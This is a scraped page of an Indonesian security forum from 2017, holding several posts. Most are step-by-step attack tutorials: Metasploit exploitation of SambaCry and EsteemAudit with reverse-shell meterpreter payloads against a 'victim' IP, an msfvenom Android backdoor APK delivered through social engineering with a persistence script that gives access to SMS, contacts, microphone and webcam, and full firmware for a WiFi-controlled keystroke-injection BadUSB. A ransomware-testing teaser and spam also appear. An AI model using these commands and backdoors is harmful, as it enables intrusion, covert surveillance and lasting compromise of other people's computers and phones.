by Elizabeeth at 21-08-2017, 14:03:30
Every person on earth is actually another one that exists with assorted needs. With the same approach all businesses company takes a different approach and desires several setting up, items, techniques along with services.


How to choose best custom software development company
There are many different types of applications that can be used in a business environment. Many third party developers put.
If you need more information about Internet & Technology and more click here:
http://www.techicy.com/how-to-select-the...mpany.html
by Habil Moonz at 03-07-2017, 20:32:46
Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.
Yaitu Ransomware WannaCry dan Petrwrap/Petya.
Gunakan Dengan Resiko Anda Sendiri.
Untuk tujuan pembelajaran saja.
Untuk tujuan pendidikan saja
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR.
KALO GABISA DECRYPT NYA !!! :V GerahLOL.GIF


by synalberto at 15-06-2017, 11:00:16
Para master dan para suhu backbox, saya mau meminta bantuan terkait backbox saya.
Kenapa backbox saya sering freeze? saya coba pakai magicsysrq tetapi tetap saja tidak bisa. Netbook tidak bisa diapa-apain, pointer tidak bergerak dan keyboard tidak berfungsi. Selama ini saya mengatasinya dengan force shutdown(tekan tombol power beberapa waktu), kalo saya menggunakan cara ini secara terus menerus saya khawatir hardware saya akan rusak. Tolong tanggapan dan solusi dari para master,suhu, dan teman teman backbox. Terima kasih
by penjagalilin at 14-06-2017, 12:12:15
Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue & DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.





1. Dapatkan module Metasploit dari Samba Exploit (is_known_pipename.rb)

Code:
root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb

Keterangan :
wget akan mengunduh file is_known_pipe_name.rb dan akan menaruhnya di direktori Metasploit Framework dengan nama sambacry.rb
Dalam hal ini bisa saja letak direktori Metasploit Framework kalian bukan di /opt/


2. Jalankan msfconsole dan mulai exploitasi

Code:
root@attackermachine~:# msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf exploit(sambacry) > set RHOST IP_KORBAN
msf exploit(sambacry) > set LHOST IP_LISTENER_ATTACKER
msf exploit(sambacry) > set TARGET 3
msf exploit(sambacry) > exploit

Keterangan :
Jika architecture OS korban adalah 32bit maka : set PAYLOAD linux/meterpreter/reverse_tcp
Untuk set TARGET saya memilih opsi 3, jalankan perintah show targets untuk melihat list architecture target yang tersedia.

[Image: Screenshot_55.png]



3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut

[Image: Screenshot_56.png]




Bonus video :






Oke sekian post nya, semoga bermanfaat. Terimakasih.
by penjagalilin at 11-06-2017, 20:03:53
Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.

[Image: Untitled-1.png]

Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit


1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit

Atau clone langsung seperti berikut

Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l



2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.

Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/



3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit

Code:
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER
msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER
msf exploit(esteemaudit) > set TARGETARCHITECTURE x86

Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit 

Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut

Code:
msf exploit(esteemaudit) > show targets

[Image: Lp-lKatrRRWov39DR-Ykww.png]

Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.

Code:
msf exploit(esteemaudit) > set TARGET 4
msf exploit(esteemaudit) > exploit

Jika sukses akan terbuka sesi meterpreter seperti berikut.

[Image: aIkCQ0tqRV2IE2LSpSZMog.png]




Bonus Video :






NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.

Oke sekian pos nya, semoga bermanfaat. Terimakasih.
by penjagalilin at 11-06-2017, 17:46:48
Menyebalkan ketika sudah mendapatkan sesi meterpreter namun mendadak disconnected di tengah jalan karena koneksi yang buruk. Untuk itu kita perlu backdoor yang dilengkapi persistensi supaya attacker dan korban bisa tetap kembali terhubung walau terputus ditengah jalan.



1. Biasanya kita menggunakan msfvenom untuk membuat sebuah backdoor yang nantinya akan ditanam di smarphone korban.

Code:
root@attackermachine:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_LISTENER_ATTACKER LPORT=PORT_LISTENER_ATTACKER R > /tmp/backdoor.apk

Keterangan 
LHOST : diisi dengan IP Address attacker yang akan digunakan untuk listening. Jika serangan dilakukan dijaringan lokal maka diisi IP komputer attacker. Jika serangan dilakukan pada korban/target yang berada diluar jaringan (Public / over Internet) maka masukkan IP Address Public attacker yang sudah dikonfigurasi untuk memiliki layanan port forwarding.
LPORT : diisi dengan Port dari IP attacker.
*Untuk via Public dalam contoh ini misalnya bisa memakai layanan forwarding dari platform Ngrok.com


2. Lalu attacker melakukan listening dengan modul multi handler dari msfconsole seperti berikut

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST IP_LISTENER_ATTACKER
msf exploit(handler) > set LPORT PORT_LISTENER_ATTACKER
msf exploit(handler) > exploit



3. Kemudian selanjutnya diperlukan Social Engineering terhadap korban supaya backdoor.apk didownload dan diinstall pada smartphone korban.


4. Saat korban menjalankan backdoor.apk maka akan terbuka sebuah sesi meterpreter seperti berikut

[Image: FFVQ4m46SYGH20jrSJsfHA.png]

Dari sini attacker sudah bisa melakukan aktivitas pada smartphone korban seperti dump_sms, dump_contacts, record_mic, webcam_snap, webcam_stream dan lain sebaginya. Jika sudah mari kita lanjutkan.


5. Selanjutnya kita akan buat sesi tersebut menjadi persistents. Maka buat sebuah file yang berisi script seperti berikut

Code:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Simpan script tersebut menjadi sebuah file berformat .sh misalnya sys.sh dan simpan dimana saja misalnya di /tmp/


6. Upload file tersebut ke smartphone korban via sesi meterpreter, upload di direktori /system/etc/init.d/ atau di /etc/init.d/ pada smartphone korban.

Code:
meterpreter > cd /system/etc/init.d/
meterpreter > upload /tmp/sys.sh

Namun hal ini memerlukan akses user root, jika smartphone sudah dalam keadaan rooted baiknya lakukan upload pada direktori ini. Namun jika belum rooted, maka solusinya pada post ini saya akan upload pada direktori /sdcard/Download/  dalam smartphone korban.

Code:
meterpreter > cd /sdcard/Download/
meterpreter > upload /tmp/sys.sh



7. Eksekusi file sys.sh tersebut dengan membuka sesi console lewat meterpreter dengan perintah shell.

Code:
meterpreter > shell

[Image: NRj9fatYSk_oNzTME9gCAg.png]

Kemudian jalankan perintah berikut.

Code:
cd /sdcard/Download/
sh sys.sh

Jika sukses akan muncul output seperti berikut

[Image: qwmkkNkHSVK7Lb3lq5mXdg.png]

Tekan Ctrl+C kemudian Y untuk keluar. Jangan kawatir, persistents akan tetap perjalan di smartphone korban. Dan selesai.



BUKTI

[Image: EzFNc2QQTc2ZaE0lAqAp1Q.png]

[Image: D8Iir9gaRd2Sjr2KZTCQuw.png]

Untuk pembuktian diatas saya menempatkan sesi meterpreter yang berjalan menjadi background dan menjalankan listener kembali secara berkali - kali, dan.. korban secara otomatis akan re-connect pada komputer attacker.



Bonus video :





Notes :
  • Jika smartphone korban dalam keadaan rooted dan IP+Port listener attacker adalah Static maka persistents akan berfungsi selamanya, meskipun korban melakukan reboot.
  • Saat korban menjalankan backdoor.apk yang sudah terinstall, maka persistents akan otomatis berjalan.
  • Bisa untuk jaringan Publik.
  • Bisa untuk jaringan Local, tentu saja.
  • Untuk menghentikan persistents di korban non-root, lakukan reboot pada smartphone korban.


Oke sekian post nya, semoga bermanfaat. Terimakasih.
by Habil Moonz at 05-05-2017, 15:59:53
Tutorial cara Hack Windows 7 (all services pack) (x86) (x64) di 1 Jaringan Tanpa si Korban Mendownload dan Menjalankan Payload/RAT nya, menggunakan RCE/0 Days ini ya guyss...
Simak Aja Tutorialnyaa.. Kalau Ngerti ada Gajelas.
Bisa kontak saya Di Facebook/Thread ini okayyy Big Grin

by koboi at 05-05-2017, 15:15:11
Oke kali ini saya akan posting sedikit demi sedikit tentang security di dalam webserver. Mungkin postingan ini akan sangat membantu bagi kawan" yang sedang belajar mengelola web server khususnya menggunakan server ubuntu. Karena di penjelasan kali ini saya akan coba menjelaskan bagaimana cara patch database dalam satu server agar tidak terjadi sql injection. Untuk caranya kali ini kita menggunakan tools yang namanya DBShield. Untuk cara penggunaannya cukup mudah, yaitu kita tinggal menginstall tools tersebut ke dalam server kemudian rubah port default mysql menjadi port yang di buka oleh DBShield di dalam script config database nya. Sebagai contoh port 3306 di ganti menjadi port 5000

Untuk cara peng installan kita bisa ketikan perintah ini

PHP Code:
root@ubuntu:~# wget http://www.backboxindonesia.or.id/tmp/dbshield_1-2_amd64.deb
root@ubuntu:~# dpkg -i dbshield_1-2_amd64.deb 

Kalo sudah terinstall kita bisa ketikan perintah ini di terminal dalam mode background

PHP Code:
root@ubuntu:~# DBShield & 

Untuk mematikan proses DBShield kita bisa ketikan perintah ini

PHP Code:
root@ubuntu:~# killall -9 DBShield 

Kalo masih penasaran gimana cara menggunakannya mungkin kawan" bisa simak video yang satu ini



Note : Tools ini hanya bisa berjalan di system amd64

Kalo masih ada kendala cara menggunakannya bisa komen di bawah.
Thanks Smile
by penjagalilin at 05-05-2017, 10:55:21
WiFi Ducky

Untuk yang belum tau tentang USB Rubber Ducky, yaitu merupakan BadUSB tool yang dikomersilkan oleh HakShop. Bagi yang sering liat serial movie Mr Robot pasti pernah liat scene/adegan ini.

[Image: mrduck7.gif]

Beberapa waktu lalu ane bikin tutor cara buat BadUSB sendiri dengan Arduino Pro Micro (ATmega32U4) yang harganya jauh lebih murah dari USB Rubber Ducky. Bisa kalian coba lihat disini.
Kemudian setelah itu ane juga bikin WiFI Jammer dengan salah satu IoT Module, yaitu NodeMCU ESP8266. Kalian bisa liat juga disini.
Tapi belum lama setelah ane buat keduanya, muncul lagi rasa penasaran. Yaitu, bagaimana jika kedua device diatas disatukan? Tool apalagi yang bisa kita buat? Lalu beberapa saat setelah ngulik sana sini, akhirnya ane nemuin salah satu project di GitHub yang kurang lebih sejalur dengan rasa penasaran ane. Lanjot.


KONSEP

Jika pada Rubber Ducky biasa, kita perlu melakukan flashing tiap kali ingin merubah payload.

Dengan Wireless Rubber Ducky masalah itu kini teratasi. Cukup dengan tool ini yang tercolok ke target, akan tersedia Panel yang bisa diakses via internet browser. Kalian bisa melakukan LIVE ATTACK via Panel yang sudah tersedia dari jauh lewat smartphone/komputer kalian. Ada beberapa fitur menarik yang akan mempermudah penggunaan. Tak perlu flashing berkali - kali, cukup upload melalui panel kapanpun kalian mau.



ALAT & BAHAN

Sebelumnya kalian perlu punya :
1. Arduino Pro Micro (ATmega32U4).
2. ESP8266, bisa dibilang jenisnya lumayan banya, disini ane pake NodeMCU ESP8266.
3. Regulator 5V StepDown 3.3V AMS1117.
4. Kabel yang kecil banget, timah, solder, gunting, dan kopi serta sepiring pisang goreng hangat.


PEMBUATAN

Langsung yuk kita garap!

1. Soldering.
Kita perlu soldering dulu. Buat rangkaian seperti dibawah ini.

[Image: a878ddf7058947f5816a3733fe97b1f3.png]


2. Flashing Arduino Pro Micro
Soldering kelar? Lanjut download & install dulu Arduino IDE. Kemudian konekin Arduino Pro Micro dengan kabel USB ke komputer. Buka Arduino IDE.
Klik tab Tool > Board > Pilih Arduino/Genuino Micro.
klik tab Tool > Port > Pilih Port milik Arduino Pro Micro yang benar, bisa dilihat di Device Manager kalo Windows.

[Image: f86ed041f6ce43528ea35b39afdb4171.png]

Lalu kita flash dengan sketch dari :
Nih sketch nya, copy aja di arduino ide, lalu klik Upload.
Code:
int program_pin = 12;
int enable_pin = 13;

void setup()
{
 Serial1.begin(115200);
 Serial.begin(115200);
 pinMode(enable_pin, OUTPUT);
 pinMode(program_pin, OUTPUT);
 digitalWrite(program_pin, LOW);
 digitalWrite(enable_pin,HIGH);
}

void loop()
{
 while(Serial1.available()){
   Serial.write((uint8_t)Serial1.read());
 }

 if(Serial.available()){
   while(Serial.available()){
     Serial1.write((uint8_t)Serial.read());
   }
 }
}
Tunggu sampai Upload done.


3. Flashing ESP8266
Cabut kabel USB, lalu colokin NodeMCU ESP8266 dengan kabel USB ke komputer. Sekarang giliran kita flash ESP8266 nya.
a. Download dulu tool flasher nya disini :
https://github.com/nodemcu/nodemcu-flasher/tree/master/Win32/Release (32bit)
https://github.com/nodemcu/nodemcu-flash...64/Release (64bit)
*sesuaikan dengan OS kalian.
b. Lalu download file .bin untuk ESP8266 nya disini :
https://github.com/spacehuhn/wifi_ducky/releases
Pilih versi v1.1 dan bernama esp8266_wifi_duck_4mb.bin
Jika udah didownload semua, buka ESP8266Flasher yang udah kalian download di poin (a) tadi.
- Pilih port milik nodemcu.
- Klik tab Config, klik tombol berlogo gerigi, kemudian pilih file esp8266_wifi_duck_4mb.bin yang udah kalian download di pin (b) tadi.
- Klik tab Advance, untuk Bautrate : 115200, Flash size : 4MByte, Flash speed : 80MHz, dan SPI Mode  : DIO.
- Balik ke tab Operation, lalu klik Flash(F).
- Tunggu sampe kelar.

[Image: 8a771106638a4898a299bb46c3ff8152.png]


4. re-Flashing Arduino Pro Micro
Cabut kabel USB nya. Trus konekin ke Arduino Pro Micro dengan kabel USB ke komputer. Lu kira udah kelar ngeflash pro micro nya? Belom! Udah nancep? Sekarang buka Arduino IDE lagi dan pastiin Port dan Type Board udah kalian periksa dengan benar.
Trus kita pake sketch dari sini :
Atau copy aja sketch dibawah ini ke Arduino IDE trus klik Upload.
Code:
#include <Keyboard.h>
#define BAUD_RATE 57200

#define ExternSerial Serial1

String bufferStr = "";
String last = "";

int defaultDelay = 0;

void Line(String _line)
{
 int firstSpace = _line.indexOf(" ");
 if(firstSpace == -1) Press(_line);
 else if(_line.substring(0,firstSpace) == "STRING"){
   for(int i=firstSpace+1;i<_line.length();i++) Keyboard.write(_line[i]);
 }
 else if(_line.substring(0,firstSpace) == "DELAY"){
   int delaytime = _line.substring(firstSpace + 1).toInt();
   delay(delaytime);
 }
 else if(_line.substring(0,firstSpace) == "DEFAULTDELAY") defaultDelay = _line.substring(firstSpace + 1).toInt();
 else if(_line.substring(0,firstSpace) == "REM"){} //nothing :/
 else if(_line.substring(0,firstSpace) == "REPLAY") {
   int replaynum = _line.substring(firstSpace + 1).toInt();
   while(replaynum)
   {
     Line(last);
     --replaynum;
   }
 } else{
     String remain = _line;

     while(remain.length() > 0){
       int latest_space = remain.indexOf(" ");
       if (latest_space == -1){
         Press(remain);
         remain = "";
       }
       else{
         Press(remain.substring(0, latest_space));
         remain = remain.substring(latest_space + 1);
       }
       delay(5);
     }
 }

 Keyboard.releaseAll();
 delay(defaultDelay);
}


void Press(String b){
 if(b.length() == 1) Keyboard.press(char(b[0]));
 else if (b.equals("ENTER")) Keyboard.press(KEY_RETURN);
 else if (b.equals("CTRL")) Keyboard.press(KEY_LEFT_CTRL);
 else if (b.equals("SHIFT")) Keyboard.press(KEY_LEFT_SHIFT);
 else if (b.equals("ALT")) Keyboard.press(KEY_LEFT_ALT);
 else if (b.equals("GUI")) Keyboard.press(KEY_LEFT_GUI);
 else if (b.equals("UP") || b.equals("UPARROW")) Keyboard.press(KEY_UP_ARROW);
 else if (b.equals("DOWN") || b.equals("DOWNARROW")) Keyboard.press(KEY_DOWN_ARROW);
 else if (b.equals("LEFT") || b.equals("LEFTARROW")) Keyboard.press(KEY_LEFT_ARROW);
 else if (b.equals("RIGHT") || b.equals("RIGHTARROW")) Keyboard.press(KEY_RIGHT_ARROW);
 else if (b.equals("DELETE")) Keyboard.press(KEY_DELETE);
 else if (b.equals("PAGEUP")) Keyboard.press(KEY_PAGE_UP);
 else if (b.equals("PAGEDOWN")) Keyboard.press(KEY_PAGE_DOWN);
 else if (b.equals("HOME")) Keyboard.press(KEY_HOME);
 else if (b.equals("ESC")) Keyboard.press(KEY_ESC);
 else if (b.equals("INSERT")) Keyboard.press(KEY_INSERT);
 else if (b.equals("TAB")) Keyboard.press(KEY_TAB);
 else if (b.equals("END")) Keyboard.press(KEY_END);
 else if (b.equals("CAPSLOCK")) Keyboard.press(KEY_CAPS_LOCK);
 else if (b.equals("F1")) Keyboard.press(KEY_F1);
 else if (b.equals("F2")) Keyboard.press(KEY_F2);
 else if (b.equals("F3")) Keyboard.press(KEY_F3);
 else if (b.equals("F4")) Keyboard.press(KEY_F4);
 else if (b.equals("F5")) Keyboard.press(KEY_F5);
 else if (b.equals("F6")) Keyboard.press(KEY_F6);
 else if (b.equals("F7")) Keyboard.press(KEY_F7);
 else if (b.equals("F8")) Keyboard.press(KEY_F8);
 else if (b.equals("F9")) Keyboard.press(KEY_F9);
 else if (b.equals("F10")) Keyboard.press(KEY_F10);
 else if (b.equals("F11")) Keyboard.press(KEY_F11);
 else if (b.equals("F12")) Keyboard.press(KEY_F12);
 else if (b.equals("SPACE")) Keyboard.press(' ');
 //else Serial.println("not found :'"+b+"'("+String(b.length())+")");
}

void setup() {
 
 Serial.begin(BAUD_RATE);
 ExternSerial.begin(BAUD_RATE);

 pinMode(13,OUTPUT);
 digitalWrite(13,HIGH);

 Keyboard.begin();
}

void loop() {
 if(ExternSerial.available()) {
   bufferStr = ExternSerial.readStringUntil("END");
   Serial.println(bufferStr);
 }
 
 if(bufferStr.length() > 0){
   
   bufferStr.replace("\r","\n");
   bufferStr.replace("\n\n","\n");
   
   while(bufferStr.length() > 0){
     int latest_return = bufferStr.indexOf("\n");
     if(latest_return == -1){
       Serial.println("run: "+bufferStr);
       Line(bufferStr);
       bufferStr = "";
     } else{
       Serial.println("run: '"+bufferStr.substring(0, latest_return)+"'");
       Line(bufferStr.substring(0, latest_return));
       last=bufferStr.substring(0, latest_return);
       bufferStr = bufferStr.substring(latest_return + 1);
     }
   }
   
   bufferStr = "";
   ExternSerial.write(0x99);
   Serial.println("done");
 }
}



Tunggu upload nya selesai. Dan udah gitu aja.



Gimana cara penggunaanya?



1. Colokin Wireless Rubber Ducky ke komputer target.
2. Connect kan smartphone/komputer kalian ke SSID milik Wireless Rubber Ducky, yang bernama WiFi Duck. Password nya adalah quackquack.
3. Buka internet browser, baiknya pake Chrome. Masuk ke IP 192.168.4.1 milik Wireless Rubber Ducky.
4. Enjoy. Ane rasa dari sini kalian bisa explore sendiri.

*Kalian juga bisa menerapkan payload rubberducky dari Hak5, kalo males bikin payload sendiri.
Hak5 Official RubberDucky Script/Payload : 
https://github.com/hak5darren/USB-Rubber...i/Payloads





Source :
https://github.com/spacehuhn/wifi_ducky


Jadi yah, sekian. Semoga bermanfaat. Terimakasih.
by gayungan at 05-05-2017, 09:39:18
Misi para master,
Saya mau nanya, kenapa nautilus (file manager) di backbox saya ga bisa membaca folder "network" pada jaringan lokal. Kalo saya make kali linux kok bisa lihat semua komputer pada jaringan lokal.
[Image: screenshot-050517-093510.php]
Welcome, Guest
You have to register before you can post on our site.
Username

Password


Search Forums

Forum Statistics
Members: 1,010
Latest member: hurr1cane
Forum threads: 184
Forum posts: 934
Online Users
There are currently 10 online users.
0 Member(s) | 10 Guest(s)

Color Skins

Change Color:

Background Patterns:

Background Images:

Background Header:

Setting Panel

Main Options: